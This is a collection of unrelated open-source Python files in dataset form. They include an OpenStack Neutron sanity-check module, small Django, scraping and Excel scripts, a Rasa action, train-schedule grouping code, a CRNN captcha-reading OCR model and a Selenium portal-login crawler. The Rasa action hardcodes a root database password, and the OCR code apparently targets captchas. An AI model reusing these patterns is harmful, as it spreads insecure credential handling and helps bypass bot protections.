checks.ovn_sb_db_schema_virtual_port_supported()\n if not result:\n LOG.warning('OVN SB DB schema does not support virtual ports. This '\n 'support was added in DB schema version 2.5.')\n return result\n\n\ndef check_ovn_nb_db_schema_gateway_chassis():\n result = checks.ovn_nb_db_schema_gateway_chassis_supported()\n if not result:\n LOG.warning('OVN NB DB schema does not support \"Chassis_Gateway\" '\n 'table. This support was added in DB schema version 5.7.')\n return result\n\n\ndef check_ovn_localnet_learn_fdb_support():\n result = checks.ovn_localnet_learn_fdb_support()\n if not result:\n LOG.warning('OVN does not support localnet_learn_fdb option. 
'\n 'This support was added in OVN 22.09.')\n return result\n\n\n# Define CLI opts to test specific features, with a callback for the test\nOPTS = [\n BoolOptCallback('ovs_vxlan', check_ovs_vxlan, default=False,\n help=_('Check for OVS vxlan support')),\n BoolOptCallback('ovs_geneve', check_ovs_geneve, default=False,\n help=_('Check for OVS Geneve support')),\n BoolOptCallback('iproute2_vxlan', check_iproute2_vxlan, default=False,\n help=_('Check for iproute2 vxlan support')),\n BoolOptCallback('ovs_patch', check_ovs_patch, default=True,\n help=_('Check for patch port support')),\n BoolOptCallback('nova_notify', check_nova_notify,\n help=_('Check for nova notification support')),\n BoolOptCallback('arp_responder', check_arp_responder,\n help=_('Check for ARP responder support')),\n BoolOptCallback('arp_header_match', check_arp_header_match,\n help=_('Check for ARP header match support')),\n BoolOptCallback('icmpv6_header_match', check_icmpv6_header_match,\n help=_('Check for ICMPv6 header match support')),\n BoolOptCallback('read_netns', check_read_netns,\n help=_('Check netns permission settings')),\n BoolOptCallback('dnsmasq_local_service_supported',\n check_dnsmasq_local_service_supported,\n help=_('Check for local-service support in dnsmasq')),\n BoolOptCallback('ovs_qos_direct_port_supported',\n check_ovs_qos_direct_ports_supported,\n help=_('Check if the ovs supports QoS for direct ports')),\n BoolOptCallback('dnsmasq_version', check_dnsmasq_version,\n help=_('Check minimal dnsmasq version'),\n deprecated_for_removal=True,\n deprecated_since='Pike'),\n BoolOptCallback('ovsdb_native', check_ovsdb_native,\n help=_('Check ovsdb native interface support')),\n BoolOptCallback('ovs_conntrack', check_ovs_conntrack,\n help=_('Check ovs conntrack support')),\n BoolOptCallback('gre_conntrack', check_gre_conntrack,\n help=_('Check if conntrack for gre tunnels traffic is '\n 'supported')),\n BoolOptCallback('ebtables_installed', check_ebtables,\n help=_('Check ebtables installation')),\n BoolOptCallback('keepalived_ipv6_support', check_keepalived_ipv6_support,\n help=_('Check keepalived IPv6 support')),\n BoolOptCallback('keepalived_garp_on_sighup_support',\n check_keepalived_garp_on_sighup_support,\n help=_('Check keepalived support sending garp on '\n 'SIGHUP.')),\n BoolOptCallback('dibbler_version', check_dibbler_version,\n help=_('Check minimal dibbler version'),\n deprecated_for_removal=True,\n deprecated_since='Pike'),\n BoolOptCallback('ipset_installed', check_ipset,\n help=_('Check ipset installation')),\n BoolOptCallback('ip6tables_installed', check_ip6tables,\n help=_('Check ip6tables installation')),\n BoolOptCallback('conntrack_installed', check_conntrack,\n help=_('Check conntrack installation')),\n BoolOptCallback('dhcp_release6', check_dhcp_release6,\n help=_('Check dhcp_release6 installation')),\n BoolOptCallback('bridge_firewalling', check_bridge_firewalling_enabled,\n help=_('Check bridge firewalling'),\n default=False),\n BoolOptCallback('ip_nonlocal_bind', check_ip_nonlocal_bind,\n help=_('Check ip_nonlocal_bind kernel option works with '\n 'network namespaces.'),\n default=False),\n BoolOptCallback('check_min_tx_rate_support', check_min_tx_rate_support,\n help=_('Check if the configured SR-IOV NICs support '\n 'the \"ip-link vf min_tx_rate\" parameter.'),\n default=False),\n BoolOptCallback('ovn_nb_db_schema_port_group_support',\n check_ovn_nb_db_schema_port_group_support,\n help=_('Check OVN NB DB schema support Port_Group'),\n default=False),\n 
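# Each BoolOptCallback entry in this list pairs a CLI flag with its check\n    # function; all_tests_passed() at the bottom of this module invokes the\n    # callback for every flag that is set.\n    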
BoolOptCallback('ovn_nb_db_schema_stateless_nat_support',\n check_ovn_nb_db_schema_stateless_nat,\n help=_('Check OVN NB DB schema support stateless NAT'),\n default=False),\n BoolOptCallback('ovn_sb_db_schema_virtual_port_support',\n check_ovn_sb_db_schema_virtual_port,\n help=_('Check OVN SB DB schema support virtual ports'),\n default=False),\n BoolOptCallback('ovn_nb_db_schema_gateway_chassis_support',\n check_ovn_nb_db_schema_gateway_chassis,\n help=_('Check OVN NB DB schema support Gateway_Chassis'),\n default=False),\n BoolOptCallback('ovn_localnet_learn_fdb_support',\n check_ovn_localnet_learn_fdb_support,\n help=_('Check OVN supports localnet_learn_fdb option'),\n default=False),\n]\n\n\ndef enable_tests_from_config():\n \"\"\"If a test can depend on configuration, use this function to set the\n appropriate CLI option to enable that test. It will then be possible to\n run all necessary tests, just by passing in the appropriate configs.\n \"\"\"\n\n cfg.CONF.set_default('arp_header_match', True)\n cfg.CONF.set_default('icmpv6_header_match', True)\n if 'vxlan' in cfg.CONF.AGENT.tunnel_types:\n cfg.CONF.set_default('ovs_vxlan', True)\n if 'geneve' in cfg.CONF.AGENT.tunnel_types:\n cfg.CONF.set_default('ovs_geneve', True)\n if ('vxlan' in cfg.CONF.ml2.type_drivers or\n cfg.CONF.VXLAN.enable_vxlan):\n cfg.CONF.set_default('iproute2_vxlan', True)\n if (cfg.CONF.notify_nova_on_port_status_changes or\n cfg.CONF.notify_nova_on_port_data_changes):\n cfg.CONF.set_default('nova_notify', True)\n if cfg.CONF.AGENT.arp_responder:\n cfg.CONF.set_default('arp_responder', True)\n if not cfg.CONF.AGENT.use_helper_for_ns_read:\n cfg.CONF.set_default('read_netns', True)\n if cfg.CONF.dhcp_driver == 'neutron.agent.linux.dhcp.Dnsmasq':\n cfg.CONF.set_default('dnsmasq_local_service_supported', True)\n cfg.CONF.set_default('dnsmasq_version', True)\n if cfg.CONF.l3_ha:\n cfg.CONF.set_default('keepalived_ipv6_support', True)\n cfg.CONF.set_default('ip_nonlocal_bind', True)\n if cfg.CONF.SECURITYGROUP.enable_ipset:\n cfg.CONF.set_default('ipset_installed', True)\n if cfg.CONF.SECURITYGROUP.enable_security_group:\n cfg.CONF.set_default('ip6tables_installed', True)\n if cfg.CONF.SECURITYGROUP.firewall_driver in (\n 'iptables',\n 'iptables_hybrid',\n ('neutron.agent.linux.iptables_firewall.'\n 'IptablesFirewallDriver'),\n ('neutron.agent.linux.iptables_firewall.'\n 'OVSHybridIptablesFirewallDriver'),\n ):\n cfg.CONF.set_default('bridge_firewalling', True)\n if cfg.CONF.SRIOV_NIC.physical_device_mappings:\n cfg.CONF.set_default('check_min_tx_rate_support', True)\n if 'ovn' in cfg.CONF.ml2.mechanism_drivers:\n cfg.CONF.set_default('ovn_nb_db_schema_port_group_support', True)\n cfg.CONF.set_default('ovn_nb_db_schema_stateless_nat_support', True)\n cfg.CONF.set_default('ovn_sb_db_schema_virtual_port_support', True)\n cfg.CONF.set_default('ovn_nb_db_schema_gateway_chassis_support', True)\n\n\ndef all_tests_passed():\n return all(opt.callback() for opt in OPTS if cfg.CONF.get(opt.name))\n\n\ndef main():\n setup_conf()\n cfg.CONF.register_cli_opts(OPTS)\n cfg.CONF.set_override('use_stderr', True)\n config.setup_logging()\n config.init(sys.argv[1:], default_config_files=[])\n agent_config.setup_privsep()\n\n if cfg.CONF.config_file:\n enable_tests_from_config()\n\n return 0 if all_tests_passed() else 
1\n","repo_name":"openstack/neutron","sub_path":"neutron/cmd/sanity_check.py","file_name":"sanity_check.py","file_ext":"py","file_size_in_byte":20367,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"27682455567","text":"\nfrom django.urls import path,include\nfrom .views import department_details, list_departments, create_employee, edit_employee\n\nurlpatterns = [\n path('',department_details,name='details'),\n path('/',list_departments,name='list'),\n path('create/',create_employee,name='create_employee'),\n path('edit//',edit_employee,name='edit_employee')\n]","repo_name":"darimachine/SoftUniWebBasicsProjects","sub_path":"employees_app/employees_app/employees/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4541596068","text":"import os\nfrom setuptools import setup, find_packages\nimport md_urlunshorten_users as app\n\n\ndef read(fname):\n try:\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n except IOError:\n return ''\n\n\nsetup(\n name=\"md-urlunshorten-users\",\n version=app.__version__,\n description=read('DESCRIPTION'),\n long_description=read('README.rst'),\n license='The MIT License',\n platforms=['OS Independent'],\n keywords='django, metrics, dashboard, widget, urlunshorten',\n author='Martin Brochhaus',\n author_email='mbrochh@gmail.com',\n url=\"https://github.com/bitmazk/md-urlunshorten-users\",\n packages=find_packages(),\n include_package_data=True,\n)\n","repo_name":"bitlabstudio/md-urlunshorten-users","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27793012059","text":"from datetime import date, timezone\nfrom random import choice\nfrom typing import List\n\nfrom fastapi import APIRouter, Depends, UploadFile, status\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom db.db import get_session\nfrom exceptions import base as exceptions\nfrom models import base as models\nfrom schemas import base as schemas\nfrom services.db import (account_crud, transaction_crud, user_cashback_crud,\n user_crud)\n\nrouter = APIRouter()\n\n\n@router.post(\n '/get_user/',\n status_code=status.HTTP_200_OK,\n response_model=schemas.User\n)\nasync def get_user(\n user_credentials: schemas.UserCredentials,\n db: AsyncSession = Depends(get_session)\n) -> schemas.User:\n users: List[models.User] = await user_crud.all(db)\n user: models.User = choice(users)\n return schemas.User.from_orm(user)\n\n\n@router.post(\n '/get_user_by_photo/',\n status_code=status.HTTP_200_OK,\n response_model=schemas.User\n)\nasync def get_user_by_photo(\n file_in: UploadFile,\n db: AsyncSession = Depends(get_session)\n) -> schemas.User:\n users: List[models.User] = await user_crud.all(db)\n user: models.User = choice(users)\n return schemas.User.from_orm(user)\n\n\n@router.get( \n '/get_user_accounts/',\n status_code=status.HTTP_200_OK,\n response_model=List[schemas.Account]\n)\nasync def get_user_accounts(\n user_id: int,\n db: AsyncSession = Depends(get_session)\n) -> List[schemas.Account]:\n user: models.User | None = await user_crud.get(db, id=user_id)\n if not user:\n raise exceptions.UserNotFoundException\n accounts: List[models.Account] = await account_crud.filter_by(\n db=db, with_cards=True,\n with_bank=True, user_id=user_id\n )\n\n return [\n 
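# Flatten each ORM account into its response schema: bank name, account\n        # number, and one schemas.Card per attached card.\n        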
schemas.Account(\n bank=account.bank.name,\n number=account.number,\n cards=[\n schemas.Card(\n card_number=card.card_number\n )\n for card in account.cards\n ]\n )\n for account in accounts\n ]\n\n\n@router.post(\n '/get_account_cashbacks/',\n status_code=status.HTTP_200_OK,\n response_model=schemas.AccountWithCashbacks\n)\nasync def get_account_cashback(\n account: schemas.AccountRequest,\n db: AsyncSession = Depends(get_session)\n) -> schemas.AccountWithCashbacks:\n cashbacks = await user_cashback_crud.account_cashbacks(\n db=db,\n account_number=account.account_number,\n month=account.month\n )\n \n return schemas.AccountWithCashbacks(\n month=account.month,\n cashbacks=[\n schemas.AccountCashback(\n product_type=cashback.cashback.product_type,\n value=cashback.value\n )\n for cashback in cashbacks\n ]\n )\n\n\n@router.post(\n '/get_account_transactions/',\n status_code=status.HTTP_200_OK,\n response_model=schemas.AccountWithTransactions\n)\nasync def get_account_transactions(\n data: schemas.TransactionsRequest,\n db: AsyncSession = Depends(get_session)\n) -> schemas.AccountWithTransactions:\n transactions = await transaction_crud.get_account_transactions(\n db=db, account_number=data.account_number,\n start_datetime=data.start_datetime\n )\n\n return schemas.AccountWithTransactions(\n number=data.account_number,\n transactions=[\n schemas.Transaction.from_orm(transaction)\n for transaction in transactions\n ]\n )\n","repo_name":"AlexStr94/finodays","sub_path":"mock_server/api/v1/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36776019578","text":"from django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\nWIND_ALPHA_TABLE = (\n (0, 7),\n (.6, 10.5),\n (1.8, 16.7),\n (3.5, 24.2),\n (5.3, 32.4),\n (7.5, 40.6),\n (9.9, 49.5),\n (12.5, 58.2),\n (15.3, 68.7),\n (18.3, 79),\n (21.6, 91),\n (25.2, 105),\n (29, 116.3)\n)\n\n\nWEAR_CLO = (\n (0.3, 'Трусы, футболка, шорты, легкие носки, сандалии'),\n (0.6, 'Мужская одежда: рубашка с короткими рукавами, легкие брюки, легкие носки, обувь.'\n 'Женская одежда: Трусы, женское белье, чулки, платье, обувь'),\n (1.0, 'Мужская одежда: Трусы, рубашка, брюки, пиджак, носки, обувью'\n 'Женская одежда: Трусы, чулки, блузка, длинная юбка, пиджак, обувь'),\n (1.3, 'Нижняя одежда с длинными рукавами и штанинами, рубашка, '\n 'брюки, свитер, пиджак, носки, обувь'),\n (1.5, 'Нижняя одежда с короткими рукавами и штанинами, рубашка, '\n 'брюки, жилет, пиджак, пальто, носки, обувь'),\n (2.0, 'Нижняя одежда с короткими рукавами и штанинами, '\n 'рубашка, брюки, пиджак, '\n ' стеганая куртка и штаны, носки, обувь, шапка, перчатки'),\n (2.55, 'Нижняя одежда с длинными рукавами и штанинами, термозащитная куртка и брюки, '\n 'парка (аляска) с тяжелой подбивкой, штаны с тяжелой подбивкой, носки, обувь, шапка, перчатки')\n)\n\n\ndef get_alpha(wind_speed):\n l, r = -1, 12\n while r - l > 1:\n m = (r + l) // 2\n if WIND_ALPHA_TABLE[m][0] < wind_speed:\n l = m\n else:\n r = m\n return WIND_ALPHA_TABLE[r][1]\n\n\ndef get_general_wear_recomendation(CLO):\n l, r = -1, 6\n while r - l > 1:\n m = (r + l) // 2\n if CLO > WEAR_CLO[m][0]:\n l = m\n else:\n r = m\n return WEAR_CLO[r]\n","repo_name":"IgnatInyutsin/weather-app","sub_path":"backend/api/restapi/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"70004502312","text":"from bs4 import BeautifulSoup\nimport requests\nfrom requests.exceptions import ConnectionError, ChunkedEncodingError\nfrom langdetect import detect\nimport re\nfrom tqdm import trange\nimport os\n\nsongs_folder = '../songs/'\nfiles_skipped = 0\ntry:\n with open('songs_done.txt', 'r') as done_file:\n count = done_file.readline()\n count = int(count)\nexcept FileNotFoundError:\n count = -1\nwith open('links.txt', 'r') as f:\n links = f.readlines()\n for i in trange(len(links)):\n if i <= count:\n continue\n link = links[i]\n try:\n html = requests.get(link).text\n except ConnectionError or ChunkedEncodingError:\n continue\n soup = BeautifulSoup(html, 'html.parser')\n song = soup.find_all('p', {'class': 'songtext'})[0]\n song_filtered = song.get_text()\n try:\n lang = detect(song_filtered[:50])\n except Exception:\n continue\n if lang != 'en':\n with open('songs_done.txt', 'w') as done_file:\n done_file.write(str(i))\n continue\n song_title = re.findall(r'/s.*?.html', link)[0][1:-5]\n try:\n with open(songs_folder + song_title + '.txt', 'w') as sf:\n sf.write(song_filtered)\n except UnicodeEncodeError as err:\n print(song_title + lang)\n print('%d files skipped' % (files_skipped + 1))\n files_skipped += 1\n try:\n os.remove(songs_folder + song_title + '.txt')\n except FileNotFoundError:\n print('Skipped file is not deleted because it is not there')\n with open('songs_done.txt', 'w') as done_file:\n done_file.write(str(i))\n","repo_name":"bharadwajpro/Tf-Idf-","sub_path":"Assignment-1/scraping/getlyrics.py","file_name":"getlyrics.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31538118825","text":"from .utils import grouper\n\n\ndef get_day_groups(trains):\n \"\"\"\n Get a list of all distinctive sets of days\n\n get_day_groups([\n Train(days={1, 2, 3}),\n Train(days={0, 1}),\n Train(days={4}),\n ])\n => [{0}, {1}, {2, 3}, {4}]\n \"\"\"\n day_sets = {frozenset(train.days) for train in trains}\n all_days = frozenset.union(*day_sets)\n groups = {all_days}\n\n for day_set in day_sets:\n couples = ((group & day_set, group - day_set) for group in groups)\n groups = {group for couple in couples for group in couple if group}\n\n return sorted(groups, key=tuple)\n\n\n# Fix: find trains of the previous day?\ndef get_next_train(train, trains):\n \"Get direct/earliest connection after a train\"\n trains = [t for t in trains if t.departure_time > train.arrival_time]\n if trains:\n return min(trains, key=lambda t: t.departure_time)\n\n\ndef get_prev_train(train, trains):\n \"Get direct/latest connection before a train\"\n trains = [t for t in trains if t.arrival_time < train.departure_time]\n if trains:\n return max(trains, key=lambda t: t.arrival_time)\n\n\ndef group_trains(trains, sorted_stops):\n \"\"\"\n Group trains by connections\n All trains that are connected belong to a same group\n Return sorted groups as lists of trains\n\n group_trains([\n Train('T', '#1', viridian=time(12, 30), pewter=time(13, 0)),\n Train('T', '#2', viridian=time(16, 0), pewter=time(16, 30)),\n Train('T', '#3', pewter=time(13, 30), cerulean=time(14, 30)),\n Train('T', '#4', pewter=time(17, 0), cerulean=time(18, 0)),\n ], ['viridian', 'pewter', 'cerulean'])\n => [\n [Train('T', '#1', ...), Train('T', '#3', ...)],\n [Train('T', '#2', ...), Train('T', '#4', ...)],\n ]\n \"\"\"\n trains_from_stop = {stop: [] for stop in sorted_stops}\n trains_to_stop = {stop: [] for stop in 
sorted_stops}\n\n    with grouper() as g:\n        for train in trains:\n            # Groups are associated with a departure time;\n            # when merged, groups get associated with earlier departure times\n            g.add(train, train.departure_time)\n            trains_from_stop[train.departure].append(train)\n            trains_to_stop[train.arrival].append(train)\n\n    for stop in sorted_stops:\n        # Connect each train with next one\n        for train in trains_from_stop[stop]:\n            next_train = get_next_train(train, trains_from_stop[train.arrival])\n            if next_train:\n                g.merge(train, next_train, merge_key=min)\n\n        # Connect each train with previous one\n        for train in trains_to_stop[stop]:\n            prev_train = get_prev_train(train, trains_to_stop[train.departure])\n            if prev_train:\n                g.merge(train, prev_train, merge_key=min)\n\n    # Sort trains in groups by time of arrival & departure\n    grouped_trains = {\n        time: sorted(trains, key=lambda t: (t.departure_time, t.arrival_time))\n        for time, trains in g.groups()\n    }\n    # Sort groups by departure time of the first train\n    return [trains for _, trains in sorted(grouped_trains.items())]\n","repo_name":"entwanne/horaires_trains","sub_path":"train_schedule/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26257675637","text":"# This file contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these actions:\n# https://rasa.com/docs/rasa/core/actions/#custom-actions/\n\n\n# This is a simple example for a custom action which utters \"Hello World!\"\n\nfrom typing import Any, Text, Dict, List\n\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.executor import CollectingDispatcher\n\nimport mysql.connector\nimport traceback\n\nclass ActionHelloWorld(Action):\n\n    def name(self) -> Text:\n        return \"action_hello_world\"\n\n    def run(self, dispatcher: CollectingDispatcher,\n            tracker: Tracker,\n            domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n\n        query = \"select text from test_table where id = 1\"\n\n        results = []  # default so the reply below still works if the query fails\n        try:\n            mydb = mysql.connector.connect(\n                host=\"localhost\",\n                user=\"root\",\n                passwd=\"123456789\",\n                database=\"rasa\"\n            )\n\n            cursor = mydb.cursor()\n            cursor.execute(query)\n\n            results = cursor.fetchall()\n            print(results)\n        except:\n            print(\"Error occurred while connecting to database or fetching data from database. 
Error Trace: {}\".format(traceback.format_exc()))\n\n dispatcher.utter_message(text=\"Hello World!\",json_message=results)\n\n return []\n","repo_name":"NgocNam1512/Rasa_japanese","sub_path":"actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14708564048","text":"import pandas as pd \nimport os\nimport numpy as np\nfrom pandas import DataFrame\n\n\n\nfile_path = 'C:\\\\Users\\\\andy4\\\\Downloads\\\\'\nbase_path = os.path.join(file_path, 'long_form.xlsx')\nfile_path = 'C:\\\\Users\\\\andy4\\\\Downloads\\\\test.xlsx'\ndf = pd.read_excel(base_path)\nall_data = np.array(df)\n\n\n\nPA_follow_count = [0] * 1389\nstore_list = []\n\ncounter = 0\ncounter1 = 0\n\ndata_store = [[\"1\" for _ in range(64)] for _ in range(1389)]\n\nfinal_data_store = [[\"1\" for _ in range(64)] for _ in range(15904)]\n\nfor i in range (0,15903):\n PA_follow_count[(int(all_data[i][0]) - 1)] = PA_follow_count[(int(all_data[i][0]) - 1)] + 1\n \n\nfor i in range (0,15903):\n if all_data[i][2] == 0 or all_data[i][2] == 1 :\n \n for j in range (2,64):\n data_store[counter][j] = all_data[i][j]\n \n counter = counter + 1\n\n \nfor i in range (0,1389):\n for j in range (0,PA_follow_count[i]):\n for k in range (0,64):\n final_data_store[counter1][k] = data_store[i][k]\n \n counter1 = counter1 + 1\n \n \nDataFrame(final_data_store).to_excel(file_path, sheet_name='test', index=False, header=True)\nprint('done.')\n","repo_name":"AndyFreeeeman/Excel_Data_Process","sub_path":"Excel_Duplicate.py","file_name":"Excel_Duplicate.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19461030091","text":"import torch\nimport torch.nn as nn\nfrom fastai.vision.all import (\n L, Path, TensorCategory, Category,\n Transform, Pipeline, ToTensor, Normalize, Resize, IntToFloatTensor,\n PILImage, PILImageBW, Image, ResizeMethod, PadMode,\n Categorize,\n RandomSplitter,\n Datasets,\n Learner,\n get_image_files,\n show_image,\n Metric,\n TensorImage,\n load_learner,\n)\nimport random\nimport numpy as np\nimport re\n\n\ndef seed_all(seed_value):\n random.seed(seed_value)\n np.random.seed(seed_value)\n torch.manual_seed(seed_value)\n\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed_value)\n torch.cuda.manual_seed_all(seed_value)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\ndef label_func(path: Path):\n \"\"\"\n Read label from file name\n :param path: path of file\n :return: label\n \"\"\"\n return list(path.name.split('.')[0])\n\n\nclass CategorizeList(Categorize):\n def __init__(self, vocab=None, add_na=False, blank='-'):\n super(CategorizeList, self).__init__(vocab=vocab, add_na=add_na, sort=False, )\n self.blank = blank\n\n @property\n def blank_idx(self):\n return self.vocab.o2i[self.blank]\n\n @property\n def n_classes(self):\n return len(self.vocab.items)\n\n def setups(self, dsets):\n dsets = sum(dsets, L(self.blank))\n super(CategorizeList, self).setups(dsets=dsets)\n\n def encodes(self, os):\n return TensorCategory([self.vocab.o2i[o] for o in os])\n\n def decodes(self, os, raw=False):\n s = ''.join([self.vocab[o] for o in os])\n if not raw:\n s = re.sub(self.blank, '', re.sub(r'(\\w)\\1+', r'\\1', s))\n\n return Category(s)\n\n\nclass BeforeBatchTransform(Transform):\n \"\"\"\n Resize image before create batch\n \"\"\"\n\n def __init__(self, 
height=32, width=32 * 5, keep_ratio=False, min_ratio=5.):\n super(BeforeBatchTransform, self).__init__()\n self.height, self.width = height, width\n self.keep_ratio, self.min_ratio = keep_ratio, min_ratio\n\n def encodes(self, items):\n images, *labels = zip(*items)\n\n height, width = self.height, self.width\n\n if self.keep_ratio:\n max_ratio = self.min_ratio\n for image in images:\n w, h = image.size\n max_ratio = max(max_ratio, w / h)\n width = int(np.floor(height * max_ratio))\n\n rs_tfm = Resize(size=(height, width), method=ResizeMethod.Pad, pad_mode=PadMode.Border)\n images = [rs_tfm(image) for image in images]\n return zip(images, *labels)\n\n\nclass CreateBatchTransform(Transform):\n \"\"\"\n Create batch\n \"\"\"\n\n def __init__(self):\n super(CreateBatchTransform, self).__init__()\n self.pipeline = Pipeline(funcs=[ToTensor, ])\n\n def encodes(self, items):\n images, *labels = zip(*items)\n\n # process images\n images = self.pipeline(images)\n xs = TensorImage(torch.stack(images, dim=0))\n\n # process labels\n if len(labels) > 0:\n ys = labels[0]\n y_lengths = torch.LongTensor([y.size(0) for y in ys])\n ys = torch.cat(ys, dim=0)\n return xs, (ys, y_lengths)\n return xs,\n\n\ndef conv_block(in_c, out_c, ks, stride, p, bn=False, leaky_relu=False):\n layers = list()\n layers.append(nn.Conv2d(\n in_channels=in_c,\n out_channels=out_c,\n kernel_size=ks,\n stride=stride,\n padding=p,\n ))\n\n if bn:\n layers.append(nn.BatchNorm2d(num_features=out_c))\n\n if leaky_relu:\n layers.append(nn.LeakyReLU(0.2, True))\n else:\n layers.append(nn.ReLU())\n return layers\n\n\nclass CNN(nn.Module):\n def __init__(self, in_channels=3, leaky_relu=False, ):\n super(CNN, self).__init__()\n ks = [3, 3, 3, 3, 3, 3, 2]\n s = [1, 1, 1, 1, 1, 1, 1]\n p = [1, 1, 1, 1, 1, 1, 0]\n c = [64, 128, 256, 256, 512, 512, 512]\n mp = [(2, 2), (2, 2), None, ((1, 2), 2), None, ((1, 2), 2), None]\n bn = [False, False, False, False, True, True, False]\n\n layers = []\n for i in range(len(ks)):\n in_c = in_channels if i == 0 else c[i - 1]\n layers.extend(\n conv_block(in_c=in_c, out_c=c[i], ks=ks[i], stride=s[i], p=p[i], bn=bn[i], leaky_relu=leaky_relu))\n if mp[i] is not None:\n kernel_size, stride = mp[i]\n layers.append(nn.MaxPool2d(kernel_size=kernel_size, stride=stride))\n\n self.cnn = nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.cnn(x)\n return out\n\n\nclass RNN(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, batch_first=False, bidirectional=True):\n super(RNN, self).__init__()\n self.input_size, self.hidden_size, self.output_size = input_size, hidden_size, output_size\n self.batch_first, self.bidirectional = batch_first, bidirectional\n\n self.lstm = nn.LSTM(\n input_size=input_size,\n hidden_size=hidden_size,\n bidirectional=bidirectional,\n batch_first=batch_first,\n )\n\n self.h2o = nn.Linear(in_features=hidden_size * 2 if bidirectional else hidden_size, out_features=output_size)\n\n def forward(self, x):\n out, _ = self.lstm(x)\n return self.h2o(out)\n\n\nclass CRNN(nn.Module):\n def __init__(self, in_channels, rnn_hidden_size, n_classes, leaky_relu=False):\n super(CRNN, self).__init__()\n self.cnn = CNN(in_channels=in_channels, leaky_relu=leaky_relu)\n self.rnn = nn.Sequential(\n RNN(\n input_size=512,\n hidden_size=rnn_hidden_size,\n output_size=rnn_hidden_size,\n batch_first=False,\n bidirectional=True\n ),\n RNN(\n input_size=rnn_hidden_size,\n hidden_size=rnn_hidden_size,\n output_size=n_classes,\n batch_first=False,\n bidirectional=True\n ),\n )\n\n def 
forward(self, x):\n cnn_out = self.cnn(x)\n cnn_out = cnn_out.squeeze(2).permute(2, 0, 1)\n rnn_out = self.rnn(cnn_out)\n return rnn_out\n\n\nclass CTCLoss(nn.Module):\n def __init__(self, blank=0):\n super(CTCLoss, self).__init__()\n self.ctc_loss = nn.CTCLoss(blank=blank, zero_infinity=True)\n\n def forward(self, output, target):\n T, N, C = output.size()\n target, target_lengths = target\n output_lengths = torch.full(size=(N,), fill_value=T, dtype=torch.long, device=output.device)\n output = output.log_softmax(2)\n return self.ctc_loss(output, target, output_lengths, target_lengths)\n\n\nclass AccMetric(Metric):\n def __init__(self):\n self.y_true, self.y_pred = [], []\n\n def reset(self):\n self.y_true, self.y_pred = [], []\n\n def accumulate(self, learn):\n label_categorize = learn.dls.tfms[1][-1]\n yb_pred = learn.pred.permute(1, 0, 2).argmax(dim=2)\n (yb, y_lengths), = learn.yb\n\n yb = torch.split(yb, y_lengths.cpu().tolist())\n self.y_true.extend([label_categorize.decode(y, raw=True) for y in yb])\n\n self.y_pred.extend([label_categorize.decode(y) for y in yb_pred])\n\n @property\n def value(self):\n # print(self.y_pred[:4], self.y_true[:4])\n n_correct = (np.array(self.y_pred) == np.array(self.y_true)).sum()\n return n_correct / float(len(self.y_true))\n\n @property\n def name(self):\n return 'accuracy'\n\n\n","repo_name":"thanhlt998/ocr_captcha_crnn","sub_path":"crnn.py","file_name":"crnn.py","file_ext":"py","file_size_in_byte":7568,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"2947878758","text":"import pandas as pd\nimport time\n\nfrom scrapy import Selector\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\n\nclass AspenWebcrawlerCPS(object):\n\n def __init__(self):\n # Set Website to Crawl\n url = \"https://aspen.cps.edu/aspen/logon.do\"\n\n # ---------REGULAR BROWSER---------------------------------\n # self.browser = webdriver.Chrome('/usr/local/bin/chromedriver')\n #\n # ---------HEADLESS BROWSER---------------------------------\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('headless')\n self.browser = webdriver.Chrome('/usr/local/bin/chromedriver',\n chrome_options=chrome_options\n )\n # ---------NAVIGATE TO WEBSITE---------------------------------\n self.browser.get(url)\n\n def login_aspen_website(self, aspen_username, aspen_password):\n \"\"\"\n\n :param aspen_username: This is the same CPS username used to log into cps email address\n :param aspen_password: This is the same CPS password used to log into cps email address\n :return: will log you into aspen website\n \"\"\"\n time.sleep(1)\n\n # fill in username and Password and click submit\n username = self.browser.find_element_by_name(\"username\")\n username.clear()\n username.send_keys(aspen_username)\n\n password = self.browser.find_element_by_name(\"password\")\n password.clear()\n password.send_keys(aspen_password)\n\n self.browser.find_element_by_id(\"logonButton\").click()\n\n time.sleep(2)\n\n def select_view(self, view):\n \"\"\"\n\n :param view: (str) this parameter takes one of three strings - \"school\", \"staff\" or \"health\".\n :return: will navigate to chosen view in aspen.\n \"\"\"\n # Selects view 